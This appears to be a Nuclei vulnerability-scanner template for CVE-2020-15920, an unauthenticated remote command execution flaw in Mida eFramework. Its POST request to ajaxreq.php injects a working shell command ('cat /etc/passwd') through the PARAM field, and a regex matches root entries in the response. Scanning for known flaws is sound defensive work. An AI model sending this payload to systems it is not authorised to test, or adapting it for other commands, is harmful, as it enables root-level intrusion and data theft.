nuclei-templates/cves/2020/CVE-2020-15920.yaml

36 lines
1.1 KiB
YAML

id: CVE-2020-15920
info:
name: Mida eFramework <=2.9.0 - Remote Command Execution
author: dwisiswant0
severity: critical
description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
reference:
- https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
- http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-15920
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-15920
cwe-id: CWE-78
tags: cve,cve2020,mida,rce
requests:
- method: POST
path:
- "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/16